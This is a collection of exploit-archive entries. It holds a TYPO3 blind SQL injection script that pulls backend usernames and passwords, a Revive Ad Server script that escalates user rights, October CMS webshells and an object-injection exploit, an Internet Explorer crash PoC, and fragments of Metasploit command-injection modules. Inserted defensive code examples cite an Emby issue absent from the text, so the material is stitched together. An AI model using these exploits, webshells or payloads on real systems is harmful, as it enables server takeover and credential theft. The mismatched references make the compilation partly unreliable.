              print_good("Triggered Debugger (#{data})")
              ch.send_data "#{payload.encoded}\n"
            else
              print_bad("Unable to trigger debugger (#{data})")
            end
          end
        end
      end

      begin
        ssh.loop unless session_created?
      rescue Errno::EBADF => e
        elog(e.message)
      end
    end
  end
end
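The module above relies on an hg-ssh style wrapper passing whatever follows `-R` straight to hg, so `--debugger` is accepted as the "repository". As an added example (not the Metasploit module's code and not Mercurial's own hg-ssh; the allowed repository set and sample commands are constructed), this is the argument validation such a wrapper should perform on SSH_ORIGINAL_COMMAND before exec'ing anything.

```python
import shlex

# Repositories this wrapper is willing to serve (constructed for the example;
# a real deployment would derive this from the authorized_keys entry).
ALLOWED_REPOS = {"projects/core", "projects/docs"}


def validate_hg_command(original_command, allowed_repos=ALLOWED_REPOS):
    """Return the argv a wrapper may exec for SSH_ORIGINAL_COMMAND, or raise ValueError.

    Only the exact shape 'hg -R <repo> serve --stdio' is accepted, and <repo>
    must be a plain relative path from the allowlist. A value such as
    '--debugger' is refused before it can ever be handed to hg.
    """
    try:
        argv = shlex.split(original_command)
    except ValueError as exc:
        raise ValueError("unparseable command: %s" % exc)
    if (len(argv) != 5 or argv[0] != "hg" or argv[1] != "-R"
            or argv[3:] != ["serve", "--stdio"]):
        raise ValueError("only 'hg -R <repo> serve --stdio' is permitted")
    repo = argv[2]
    if repo.startswith("-") or repo.startswith("/") or ".." in repo.split("/"):
        raise ValueError("repository argument looks like an option or a traversal: %r" % repo)
    if repo not in allowed_repos:
        raise ValueError("repository not allowed: %r" % repo)
    return ["hg", "-R", repo, "serve", "--stdio"]


def is_permitted(original_command, allowed_repos=ALLOWED_REPOS):
    """Boolean view of validate_hg_command, handy for logging and tests."""
    try:
        validate_hg_command(original_command, allowed_repos)
        return True
    except ValueError:
        return False


# Constructed commands: a legitimate push/pull session, the module's
# '--debugger' variant, and a few other shapes a wrapper must refuse.
SAMPLE_COMMANDS = [
    "hg -R projects/core serve --stdio",
    "hg -R --debugger serve --stdio",
    "hg -R projects/core serve --stdio --debugger",
    "hg -R ../other serve --stdio",
    "hg -R projects/secret serve --stdio",
    "hg -R 'projects/core' serve --stdio; id",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print("%-48s permitted: %s" % (cmd, is_permitted(cmd)))
```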
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1118

There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.

PoC:

===========================================================
-->

<!-- saved from url=(0014)about:internet -->
<style>
#details { transition-duration: 61s; }
</style>
<script>
function go() {
  document.fgColor = "foo";
  m.setAttribute("foo", "bar");
  document.head.innerHTML = "a";
}
</script>
<body onload=go()>
<details id="details">
<summary style="transform: scaleY(4)">
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
<style></style>

<!--
===========================================================

The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.

Debug info:

(d10.1504): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000    mov     edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????

0:021> r
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000    mov     edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????

0:021> k
 # ChildEBP RetAddr  
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b
-->
            
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli


#!/usr/bin/python3

# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#

import requests
import string

 
session = requests.Session()
session.proxies = {'http': 'localhost:8080'}


# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'

FULL_CHARSET = string.ascii_letters + string.digits + '$./'


def blind(field, table, condition, charset):
    # We add 9 so that the result has two digits
    # If the length is superior to 100-9 it won't work
    size = blind_size(
        'length(%s)+9' % field, table, condition,
        2, string.digits
    )
    size = int(size) - 9
    data = blind_size(
        field, table, condition,
        size, charset
    )
    return data


def select_position(field, table, condition, position, char):
    payload = 'select(%s)from(%s)where(%s)' % (
        field, table, condition
    )
    payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
    payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
        payload, ord(char)
    )
    return payload


def blind_size(field, table, condition, size, charset):
    string = ''
    for position in range(size):
        for char in charset:
            payload = select_position(field, table, condition, position+1, char)
            if test(payload):
                string += char
                print(string)
                break
        else:
            raise ValueError('Char was not found')

    return string


def test(payload):
    response = session.post(
        URL,
        data=data(payload)
    )
    response = response.text
    return response.index(PATTERN0) < response.index(PATTERN1)


def data(payload):
    return {
        'tx_news_pi1[overwriteDemand][order]': payload,
        'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
        'tx_news_pi1[search][subject]': '',
        'tx_news_pi1[search][minimumDate]': '2016-01-01',
        'tx_news_pi1[search][maximumDate]': '2016-12-31',
    }


# Exploit
print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))
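Both the Emby 'MediaTypes' issue above (a stray quote in a comma-separated list reaching SQLite) and the TYPO3 news module issue (user input pasted into ORDER BY) come from assembling SQL from request strings. As an added example (not Emby's or TYPO3's code; the table, columns and sort keys are constructed), this shows the string-built query next to a version that binds each list element and allowlists the sort column.

```python
import sqlite3

# Constructed in-memory library table; the schema is hypothetical and stands in
# for the real Emby/TYPO3 tables, which this example does not reproduce.
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, media_type TEXT, sort_name TEXT);
INSERT INTO items VALUES (1, 'Song',  'Audio', 'song');
INSERT INTO items VALUES (2, 'Clip',  'Video', 'clip');
INSERT INTO items VALUES (3, 'Cover', 'Photo', 'cover');
"""

# Request-level sort keys mapped to real columns: anything not listed is refused,
# so an ORDER BY expression can never be assembled from user input.
ALLOWED_SORT = {"SortName": "sort_name", "Id": "id"}


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_query(con, media_types, sort_by):
    """String-built query: the comma list and the sort field are pasted in verbatim."""
    quoted = ",".join("'%s'" % t for t in media_types.split(","))
    sql = "SELECT name FROM items WHERE media_type IN (%s) ORDER BY %s" % (quoted, sort_by)
    return [row[0] for row in con.execute(sql)]


def safe_query(con, media_types, sort_by):
    """Bind every list element as a parameter and allowlist the sort column."""
    types = [t for t in media_types.split(",") if t]
    if not types:
        raise ValueError("at least one media type is required")
    column = ALLOWED_SORT.get(sort_by)
    if column is None:
        raise ValueError("unsupported sort field: %r" % sort_by)
    placeholders = ",".join("?" * len(types))
    sql = "SELECT name FROM items WHERE media_type IN (%s) ORDER BY %s" % (placeholders, column)
    return [row[0] for row in con.execute(sql, types)]


def run_demo():
    """Exercise both versions with a normal request and the stray-quote request."""
    con = connect()
    results = {
        "safe_normal": safe_query(con, "Audio,Video", "SortName"),
        # The trailing quote is bound as data, so it simply matches nothing.
        "safe_stray_quote": safe_query(con, "Audio,Video'", "SortName"),
    }
    try:
        vulnerable_query(con, "Audio,Video'", "sort_name")
        results["vulnerable_errored"] = False
    except sqlite3.OperationalError:
        # Mirrors the advisory's 500 Internal Server Error / SQLiteException.
        results["vulnerable_errored"] = True
    try:
        safe_query(con, "Audio", "id*2")
        results["sort_expression_rejected"] = False
    except ValueError:
        results["sort_expression_rejected"] = True
    con.close()
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```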
            
---------------------------------------------------------------
# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
# Date: 24/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
# Vendor Website : https://www.revive-adserver.com/
# Software download : https://www.revive-adserver.com/download/
# Version: 4.0.1
# Tested on: Windows 7 x64 SP1 / Kali Linux


Description :

A vulnerability has been discovered in Revive Ad Server, which can be
exploited by malicious people to conduct cross-site scripting attacks.
When you create a banner using Generic HTML Banner, input passed via the
'htmltemplate' parameter to '/banner-edit.php' is not properly sanitised
before being returned to the user (this is probably expected, as it's an
HTML banner). But this can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of an affected site.

This XSS vector allows scripts to be executed that gather the CSRF token
and submit a form to update user rights.


Here's the script :

---------------------- Javascript-------------------------------

var tok = document.getElementsByName('token')[0].value;

var txt = '<form method="POST" id="hacked" action="agency-user.php">'
txt += '<input type="hidden" name="submit[]" value="1"/>'
txt += '<input type="hidden" name="token" value="' + tok + '"/>'
txt += '<input type="hidden" name="userid" value="2"/>'
txt += '<input type="hidden" name="email_address" value="test2@test.com"/>'
txt += '<input type="hidden" name="agencyid" value="1"/>'
txt += '<input type="hidden" name="permissions[]" value="10"/>'
txt += '</form>'

var d1 = document.getElementById('firstLevelContent');

d1.insertAdjacentHTML('afterend', txt);

document.getElementById("hacked").submit();


---------------------- Javascript End-------------------------------

(Little trick to submit a form that has a "submit" parameter: just use a
list, "submit[]".)

This will update the user's rights and allow the attacker to manage accounts.

POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM

Patch : No patch yet

---------------------------------------------------------------
            
October CMS v1.0.412 several vulnerabilities
############################################


Information
===========

Name:          October CMS v1.0.412 (build 412)
Homepage:      http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
               management permission
CVE:           pending

Credit:        Anti Räis
HTML version:  https://bitflipper.eu


Product
=======

October is a free, open-source, self-hosted CMS platform based on the
Laravel PHP Framework.


Description
===========

October CMS build 412 contains several vulnerabilities. Some of them
allow an attacker to execute PHP code on the server. The following issues
have been identified:

    1. PHP upload protection bypass
    2. Apache .htaccess upload
    3. stored WCI in image name
    4. reflected WCI while displaying project ID
    5. PHP code execution via asset management
    6. delete file via PHP object injection
    7. asset save path modification


Proof of Concepts
=================

1. PHP upload protection bypass
-------------------------------

An authenticated user with permission to upload and manage media contents can
upload various files to the server. The application prevents the user from
uploading PHP code by checking the file extension. It uses a black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().

==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109         return [
110                 // redacted
111                 'php',
112                 'php3',
113                 'php4',
114                 'phtml',
115                 // redacted
116         ];
117 }
====================  source end  ========================

We can easily bypass the file upload restriction on those systems by using an
alternative extension, e.g. if we upload sh.php5 to the server:

==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
====================  source end  ========================

The code can be executed by making the following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd

2. Apache .htaccess upload
--------------------------

As described in the PHP upload protection bypass section, the application uses
a black-list based defense. It does not prevent the attacker from uploading a
.htaccess file, which makes it exploitable on Apache servers. The attacker can
use it to add another handler for PHP files and upload code under an
alternative name. The attacker first has to upload a .htaccess configuration
file with the following settings:

==================== source start ========================
AddHandler application/x-httpd-php .z
====================  source end  ========================

This makes Apache execute all .z files as PHP. After uploading code named sh.z
to the server, it can be used to execute code as described previously.

3. stored WCI in image name
---------------------------

An authenticated user with permission to customize back-end settings can store
a WCI payload in the image name. The functionality is located at:

  Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
  (edit name) -> (add title)

Set the name to the following value:

==================== source start ========================
"><script>alert("stored WCI")</script x="
====================  source end  ========================

The payload is executed when the victim clicks on the image name to edit it.

When the administrator edits the user's profile image, the attacker's payload
is executed, allowing the attacker to run JavaScript during the administrator's
active session. This can be used, for example, to give another user
"super-user" permission.

4. reflected WCI while displaying project ID
--------------------------------------------

An authenticated user with permission to manage software updates can "Attach
Project". When an invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or type the payload into the input field, it isn't
easily exploitable.

==================== source start ========================
"><script>alert(1)</script x="
====================  source end  ========================

5. PHP code execution via asset management
------------------------------------------

An authenticated user with permission to manage website assets can use this
functionality to upload PHP code and execute it on the server.

Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.

First, the attacker creates a new asset test.js with the following content:

==================== source start ========================
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
====================  source end  ========================

After saving the file, the attacker renames it to test.php5 by clicking on the
">_" icon on the newly created file. A modal window opens which allows a new
filename to be specified.

URL to execute PHP code:
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah

6. delete file via PHP object injection
---------------------------------------

An authenticated user with the "Create, modify and delete CMS partials" or
"Create, modify and delete CMS layouts" permission can move assets to different
folders. This functionality is vulnerable to PHP object injection. User input
is read from the selectedList parameter on line 11 and passed as an argument to
unserialize(). The unserialized array is passed to validatePath() on line 32.

==================== source start ========================
 1 <?php namespace Cms\Widgets;
 2
 3 class AssetList extends WidgetBase
 4 {
 5     // redacted
 6
 7     public function onMove()
 8     {
 9         $this->validateRequestTheme();
10
11         $selectedList = Input::get('selectedList');
12         if (!strlen($selectedList)) {
13             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
14         }
15
16         $destinationDir = Input::get('dest');
17         if (!strlen($destinationDir)) {
18             throw new ApplicationException(
                   Lang::get('cms::lang.asset.select_destination_dir'));
19         }
20
21         $destinationFullPath = $this->getFullPath($destinationDir);
22         if (!file_exists($destinationFullPath) ||
               !is_dir($destinationFullPath)) {
23             throw new ApplicationException(
                   Lang::get('cms::lang.asset.destination_not_found'));
24         }
25
26         $list = @unserialize(@base64_decode($selectedList));
27         if ($list === false) {
28             throw new ApplicationException(
                   Lang::get('cms::lang.asset.selected_files_not_found'));
29         }
30
31         foreach ($list as $path) {
32             if (!$this->validatePath($path)) {
33                 throw new ApplicationException(
                       Lang::get('cms::lang.asset.invalid_path'));
34             }
35
36     // ...
====================  source end  ========================

The following PHP exploit uses the vulnerability. It requires an authenticated
user's session to execute, as described previously.

==================== source start ========================
<?php

class Swift_Mime_SimpleHeaderSet {}

class Swift_KeyCache_DiskKeyCache
{
    private $_keys;

    public function __construct($path, $filename) {
        $this->_keys = [$path => [ $filename => null]];
    }
}

class Swift_Mime_SimpleMimeEntity {
        private $_headers;
        private $_cache;
        private $_cacheKey;

        public function __construct($filename, $path = '') {
                $this->_headers = new Swift_Mime_SimpleHeaderSet();
                $this->_cache = new Swift_KeyCache_DiskKeyCache($path,
                    $filename);
                $this->_cacheKey = $path;
        }
}

function payload($filename) {
        $builder = new Swift_Mime_SimpleMimeEntity($filename);
        return base64_encode(serialize([$builder]));
}

function http($config) {
        $ch = curl_init($config['url']);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS,
            http_build_query($config['data']));
        curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
        curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
        curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        return curl_exec($ch);
}

function get_config($url, $filename, $session) {
        return [
                'url' => $url.'/backend/cms',
                'data' => [
                        'dest' => '/',
                        'theme' => 'demo',
                        'selectedList' => payload($filename),
                ],
                'headers' => [
                        'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
                        'X-Requested-With: XMLHttpRequest',
                ],
                'cookies' => 'admin_auth='.$session,
                'proxy' => 'localhost:8080',
        ];
}

$url = 'http://victim.site';
$session = '<specify admin_auth cookie value here>';
$filename = '/tmp/target.txt';

echo http(get_config($url, $filename, $session));
====================  source end  ========================
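As an added hardening example (not October CMS code), here are the two ways a
defender would replace the unserialize() call on line 26 above: decode JSON
instead, which can only yield arrays and scalars, or keep the base64/serialize
wire format but pass allowed_classes => false and validate the shape before use.
The function names and the constructed payloads are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not October CMS code. selectedList is attacker-controlled
// input; the original code base64-decodes it and hands it to unserialize(),
// which instantiates whatever classes the payload names. Both decoders below
// end in the same shape check, so the rest of onMove() sees only a flat list
// of non-empty strings, whatever arrived on the wire.

/** Option (a): a JSON list of paths. No class can ever be instantiated. */
function decodeSelectedListJson(string $raw): array
{
    $list = json_decode($raw, true, 512, JSON_THROW_ON_ERROR);
    return assertStringList($list);
}

/** Option (b): keep the legacy base64(serialize()) format but refuse objects. */
function decodeSelectedListLegacy(string $raw): array
{
    $bytes = base64_decode($raw, true);
    if ($bytes === false) {
        throw new InvalidArgumentException('selectedList is not valid base64');
    }
    // allowed_classes => false (PHP >= 7.0) turns every object in the payload
    // into __PHP_Incomplete_Class instead of instantiating it, so no
    // __destruct, __wakeup or __toString of an attacker-chosen class runs.
    $list = unserialize($bytes, ['allowed_classes' => false]);
    if ($list === false) {
        throw new InvalidArgumentException('selectedList did not deserialize');
    }
    return assertStringList($list);
}

/** Shared shape check: a non-empty array of plain, NUL-free strings. */
function assertStringList($list): array
{
    if (!is_array($list) || $list === []) {
        throw new InvalidArgumentException('selectedList must be a non-empty array');
    }
    foreach ($list as $path) {
        if (!is_string($path) || $path === '' || strpos($path, "\0") !== false) {
            throw new InvalidArgumentException('selectedList entries must be plain paths');
        }
    }
    return array_values($list);
}

// Constructed inputs: a legitimate move request and a stand-in for an
// injected object (the real chain in the exploit above uses Swift classes;
// any object is rejected here regardless of its class).
$benign = ['js/app.js', 'css/site.css'];
$gadget = [(object) ['path' => '/tmp/target.txt']];

$cases = [
    'json, benign'   => fn() => decodeSelectedListJson(json_encode($benign)),
    'legacy, benign' => fn() => decodeSelectedListLegacy(base64_encode(serialize($benign))),
    'legacy, object' => fn() => decodeSelectedListLegacy(base64_encode(serialize($gadget))),
    'json, object'   => fn() => decodeSelectedListJson(json_encode($gadget)),
];
foreach ($cases as $label => $run) {
    try {
        printf("%-15s accepted: %s\n", $label, implode(', ', $run()));
    } catch (Throwable $e) {
        printf("%-15s rejected: %s\n", $label, $e->getMessage());
    }
}
```

The two "benign" cases are accepted and both "object" cases are rejected; with option (b) the payload still parses, but the object arrives as __PHP_Incomplete_Class and fails the string check without any of its methods having run.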

7. asset save path modification
-------------------------------

An authenticated user with permission to manage website assets can modify the
path the file is saved to. This allows an attacker to save css, js, less, sass
and scss files at different locations. The attacker can possibly use it to
execute JavaScript on the site, if the application tries to load a file on the
server that does not exist or the attacker manages to delete the file
beforehand. When an attacker creates a new asset, the following request is
made.

Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.

==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close

fileName=test.js&content=test&templateType=asset&theme=demo
==================== request end ====================

The parameter fileName isn't validated and allows an attacker to specify the
path where the file should be saved to. Overwriting files is forbidden. If we
specify the file name as ../../../test.js, the file is created at the root of
the site's web directory.
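The three name-handling defects in this advisory (the black-listed extensions
in issue 1, the .htaccess upload in issue 2 and the ../ traversal here) share
one fix: validate the submitted name against an allow-list and prove that the
resolved path stays inside the asset root. The following is an added example,
not October CMS code; AssetNameValidator, ALLOWED_EXTENSIONS and
ALLOWED_INNER_TOKENS are hypothetical names, the extension list is the set of
asset types this issue mentions, and the scratch directory is created locally.

```php
<?php
declare(strict_types=1);

// Added example, not October CMS code: allow-list validation of a
// user-supplied asset file name plus a realpath() containment check.
const ALLOWED_EXTENSIONS   = ['css', 'js', 'less', 'sass', 'scss']; // types named in issue 7
const ALLOWED_INNER_TOKENS = ['min'];  // constructed: permits jquery.min.js, nothing else

final class AssetNameValidator
{
    private string $root;

    public function __construct(string $assetRoot)
    {
        $real = realpath($assetRoot);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException("asset root does not exist: $assetRoot");
        }
        $this->root = $real;
    }

    /** Returns null when the name is acceptable, otherwise the reason for rejection. */
    public function reject(string $fileName): ?string
    {
        // Only '/' may separate directories; backslashes, NUL bytes, spaces and
        // control characters are never part of a legitimate asset path.
        if (preg_match('#^[A-Za-z0-9_./-]+$#', $fileName) !== 1) {
            return 'illegal character in file name';
        }
        $segments = explode('/', $fileName);
        $base = array_pop($segments);
        foreach ($segments as $dir) {
            // Rejects "", "." and "..", so "a//b", "./x" and "../x" all fail here.
            if ($dir === '' || $dir[0] === '.') {
                return 'illegal directory segment';
            }
        }
        // Dot-files such as .htaccess or .user.ini are never assets.
        if ($base === '' || $base[0] === '.') {
            return 'dot-file or empty base name';
        }
        $parts = explode('.', $base);
        array_shift($parts);                         // drop the base name itself
        if ($parts === []) {
            return 'missing extension';
        }
        // The last segment decides how most servers serve the file, but Apache's
        // mod_mime looks at every dotted segment, so inner ones are checked too.
        $ext = strtolower(array_pop($parts));
        if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
            return "extension '.$ext' not allow-listed";
        }
        foreach ($parts as $inner) {
            if (!in_array(strtolower($inner), ALLOWED_INNER_TOKENS, true)) {
                return "inner extension '.$inner' not allow-listed";
            }
        }
        return null;
    }

    /** Resolves the save path and proves it stays inside the asset root. */
    public function resolve(string $fileName): string
    {
        if (($why = $this->reject($fileName)) !== null) {
            throw new InvalidArgumentException($why);
        }
        $candidate  = $this->root . DIRECTORY_SEPARATOR . str_replace('/', DIRECTORY_SEPARATOR, $fileName);
        $parentReal = realpath(dirname($candidate));
        // realpath() also follows symlinks, so a link planted inside the root
        // cannot redirect the write elsewhere.
        $prefix = $this->root . DIRECTORY_SEPARATOR;
        if ($parentReal === false
            || ($parentReal !== $this->root && strncmp($parentReal, $prefix, strlen($prefix)) !== 0)) {
            throw new InvalidArgumentException('destination escapes the asset root');
        }
        $target = $parentReal . DIRECTORY_SEPARATOR . basename($candidate);
        if (file_exists($target)) {
            throw new InvalidArgumentException('refusing to overwrite an existing file');
        }
        return $target;
    }
}

// Self-contained demo against a scratch directory created here.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'assets_' . bin2hex(random_bytes(4));
mkdir($root . '/js/vendor', 0700, true);
$v = new AssetNameValidator($root);

$probes = [
    'test.js',                                                  // accepted
    'js/vendor/jquery.min.js',                                  // accepted, inner token allow-listed
    'sh.php5',                                                  // issue 1: not on the allow-list
    '.htaccess',                                                // issue 2: dot-file
    'test.php5',                                                // issue 5 rename target
    '../../../modules/backend/assets/js/vendor/jquery.min.js',  // issue 7 traversal
    'shell.php.js',                                             // Apache multi-extension case
];
foreach ($probes as $p) {
    $why = $v->reject($p);
    printf("%-58s %s\n", $p, $why === null ? 'OK -> ' . $v->resolve($p) : 'REJECT: ' . $why);
}
```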

We can execute JavaScript by combining this issue with the file deletion
vulnerability via POI. For that, we are going to replace the
modules/backend/assets/js/vendor/jquery.min.js file with our own content. It is
loaded on the page for every authenticated user and allows us as an attacker to
take control of their session. The payload for this example is the following:

==================== source start ========================
var c = new XMLHttpRequest();
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
c.onreadystatechange = () => eval(c.responseText);
c.send();
var h = () => {location.hash = 'Hacked: ' + (new Date())};
setInterval(h, 1000);
====================  source end  ========================

After we delete the jquery.min.js file on the server, we create a new asset with
the payload as its content.

==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 371
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close

fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
var+c+%3d+new+XMLHttpRequest()%3b
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
c.send()%3b
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
setInterval(h,+1000)%3b
&templateType=asset&theme=demo
==================== request end ====================

After the victim authenticates, the payload is executed. For this example, it
changes the URL hash every second, but it could be used to take control of the
victim's session.


Conclusion
==========

An authenticated user with permission to manage website assets, upload and
manage media contents or customize back-end settings can use the
vulnerabilities found there to execute PHP code on the server and take control
of the application.

A new release, v1.0.413, has been made available as a result:

    https://octobercms.com/support/article/rn-8
    https://github.com/octobercms/october/releases/tag/v1.0.413.


Timeline
========

05.04.2017 | me > developer     | first vulnerability discovered
06.04.2017 | me > developer     | initial contact
07.04.2017 | me > developer     | sent PoC
09.04.2017 | developer > me     | developer implemented patches;
                                  requested additional information
09.04.2017 | me > developer     | sent PoC with additional information
                                  and findings
10.04.2017 | developer > me     | all issues were patched
11.04.2017 | developer > public | new release
11.04.2017 | me > DWF           | CVE request
12.04.2017 | me > public        | full disclosure

---
Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'WePresent WiPG-1000 Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in an undocumented
        CGI file in several versions of the WePresent WiPG-1000 devices.
        Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matthias Brun', # Vulnerability Discovery, Metasploit Module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
        ],
      'Payload'        =>
        {
          'Compat'     =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat openssl'
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['WiPG-1000 <=2.0.0.7', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 20 2017',
      'DefaultTarget'  => 0))
  end


  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/cgi-bin/rdfs.cgi'
    })
    if res && res.body.include?("Follow administrator instructions to enter the complete path")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status('Sending request')
    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/cgi-bin/rdfs.cgi',
      'vars_post' => {
        'Client' => ";#{payload.encoded};",
        'Download' => 'Download'
      }
